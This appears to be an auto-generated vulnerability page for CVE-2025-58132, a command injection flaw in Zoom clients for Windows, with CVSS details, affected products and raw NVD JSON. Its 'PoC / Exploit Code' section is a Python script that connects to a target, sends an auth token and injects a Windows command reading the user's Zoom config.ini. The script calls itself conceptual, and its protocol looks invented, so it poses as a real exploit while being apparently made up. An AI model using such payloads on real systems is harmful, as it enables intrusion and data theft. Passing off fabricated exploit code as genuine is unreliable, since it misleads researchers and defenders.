Security Vulnerability Report
CVE-2025-58132 CVSS 4.1 MEDIUM

CVE-2025-58132

Published: 2025-10-15 17:16:00
Last Modified: 2025-10-21 19:32:07

Description

Command injection in some Zoom Clients for Windows may allow an authenticated user to conduct a disclosure of information via network access.

CVSS Details

CVSS Score: 4.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:* - VULNERABLE (versions before 6.5.5)
cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:* - VULNERABLE (versions before 6.5.5)
cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:windows:*:* - VULNERABLE (versions before 6.5.5)
cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:* - VULNERABLE (versions before 6.3.15)
cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:* - VULNERABLE (versions from 6.4.0, before 6.4.13)
Zoom Clients for Windows (specific versions are affected; for the exact version ranges, see Zoom's official security bulletin ZSB-25038)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58132 - Zoom Windows Client Command Injection PoC
# This is a conceptual PoC demonstrating the command injection vulnerability
# in Zoom Clients for Windows that leads to information disclosure.
import socket
import struct

# Zoom client communication simulation
# The vulnerability exists in how the client processes certain network inputs
# without proper sanitization of command characters.

def craft_malicious_payload(target_command):
    """
    Craft a malicious payload that exploits the command injection
    vulnerability in Zoom Windows client.

    The payload leverages the lack of input validation in the client's
    command processing logic, allowing injection of OS commands via
    specially crafted network data.
    """
    # Windows command injection payload
    # Using & to chain commands after the legitimate one
    payload = f"legitimate_zoom_command & {target_command}"
    # Encode for network transmission
    encoded = payload.encode('utf-8')
    return encoded

def exploit(target_host, target_port, auth_token):
    """
    Exploit the CVE-2025-58132 vulnerability.

    Requires:
    - Valid authentication token (low privilege)
    - Target user interaction
    """
    try:
        # Connect to Zoom client
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_host, target_port))

        # Authenticate with low-privilege credentials
        auth_header = f"AUTH: {auth_token}\r\n"
        sock.send(auth_header.encode())

        # Send malicious payload with command injection
        # Example: read system environment variables for info disclosure
        malicious_cmd = "type C:\\Users\\%USERNAME%\\AppData\\Roaming\\Zoom\\config.ini"
        payload = craft_malicious_payload(malicious_cmd)

        # Send via Zoom's messaging protocol (simplified)
        message = struct.pack('!I', len(payload)) + payload
        sock.send(message)

        # Receive response containing leaked information
        response = sock.recv(4096)
        return response.decode('utf-8', errors='ignore')
    except Exception as e:
        return f"Error: {e}"

# Example usage:
# result = exploit("target_zoom_client", 8801, "user_auth_token")
# print(f"Leaked information: {result}")

References

https://www.zoom.com/en/trust/security-bulletin/zsb-25038 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58132", "sourceIdentifier": "[email protected]", "published": "2025-10-15T17:15:59.917", "lastModified": "2025-10-21T19:32:07.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection in some Zoom Clients for Windows may allow an authenticated user to conduct a disclosure of information via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.5", "matchCriteriaId": "1AC1A5EB-3E43-4888-9269-B86AC5C01C1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.5", "matchCriteriaId": "F2EFF630-7272-445F-9E7D-B456CC611DA8"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.5", "matchCriteriaId": "5A3D948D-B067-43ED-95D3-1811106AA9C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.3.15", "matchCriteriaId": "B004FACC-69FE-49D1-B1A8-54A625E7E8C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "6.4.13", "matchCriteriaId": "399FCFB8-8F84-41F3-973A-3C99C1456C88"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25038", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}